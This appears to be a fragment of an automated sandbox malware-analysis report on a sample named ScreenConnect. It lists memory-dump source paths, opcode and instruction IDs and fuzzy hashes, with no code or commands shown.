                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 134e2781ccbf61119f4f01638d936272540e3e4c412fc11d294e86c05e6d10e1
                                                                                                                                                                                                                                                  • Instruction ID: 66be2540fcc04a8cb88144de7f06856e6ab0f2c46be0d4d6cd2eaeb7a2d2b4a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 134e2781ccbf61119f4f01638d936272540e3e4c412fc11d294e86c05e6d10e1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CF0E53140D68D8FCF82EB68D0918D57FB0FE16324B0501C7E048CB063E7219A45CB82
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: df60aec06ff7a68617604bbe67bda146499f5f031725faa5b9892acb9c500743
                                                                                                                                                                                                                                                  • Instruction ID: c7f355ec0f4945005c2e10b25b5a3a79c9ccc855fa218d4e265e7465cde6166e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df60aec06ff7a68617604bbe67bda146499f5f031725faa5b9892acb9c500743
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCE0922110F7C40FD752973884688E03FA0AE1321434900EBD4818F0B3E9158649D741
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 5b29a1d9ff0dafa37c3e07c8ca4f178ade68f9bfdd565af605f31d2061ab4d9d
                                                                                                                                                                                                                                                  • Instruction ID: b9a372d68cf37b5b2d3558c3bdce1909e519ca7a47850cb9ce775459f37bd0f5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b29a1d9ff0dafa37c3e07c8ca4f178ade68f9bfdd565af605f31d2061ab4d9d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55E0863550950C9FCF11EB68E451CDA7B74FF55319B010197E00EC7061D722A998CBD1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: e05b2b916f61a47e02f39501cc111d69fb6986f8c390aea5192cf68fc98cc671
                                                                                                                                                                                                                                                  • Instruction ID: 5c2bddee3838e9340ac0894fac559cf5e10374d2147c090cc7e86d24c3fb9d46
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e05b2b916f61a47e02f39501cc111d69fb6986f8c390aea5192cf68fc98cc671
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48E08615E4E61B02FB7C65A5A8713B550909F4930CF07407ED41D811D5DC6C9D814151
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ec28daf78ea00aa79927bbe52ac0c2be0f77f98060ecceb84763723918ad2b77
                                                                                                                                                                                                                                                  • Instruction ID: 67b252471f95b57ec2754b2da8d07bb6cdfd500e732c3cdece5b1f04563a89ee
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec28daf78ea00aa79927bbe52ac0c2be0f77f98060ecceb84763723918ad2b77
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AD0A702B2AC2D07E7B4A2AC78266F802C2F7DC6E47850472D41DC72EAEC089D8343C1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 58499ff18bda4e1784edac01d81f1a6c4e3bf58ab2b75a29f3ca82bd0d36c4f6
                                                                                                                                                                                                                                                  • Instruction ID: 9d208fa20944f6de62d923b3431589fefac090352ee9a0904164dac9e26435eb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58499ff18bda4e1784edac01d81f1a6c4e3bf58ab2b75a29f3ca82bd0d36c4f6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0C09B14F1BD4E47F165EBE4C4711BD11527F8C604B524435D02DC51E6CD3C67015645
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 51dbf5068bd19bc99185308198934b6a2e4bb80bc33e61894d618076606cdc94
                                                                                                                                                                                                                                                  • Instruction ID: b0ac7ff2e89efd275264e847f01d80ac5e3db047e92c428fbd88fe6a99cb7437
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51dbf5068bd19bc99185308198934b6a2e4bb80bc33e61894d618076606cdc94
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37A00240F0FD5E46E075E6D4802117D01451F59608B224135D16DC52F6CD2C6B421296